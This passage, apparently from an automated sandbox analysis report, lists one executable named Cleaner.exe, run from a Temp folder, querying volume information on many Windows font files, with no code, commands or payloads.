                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
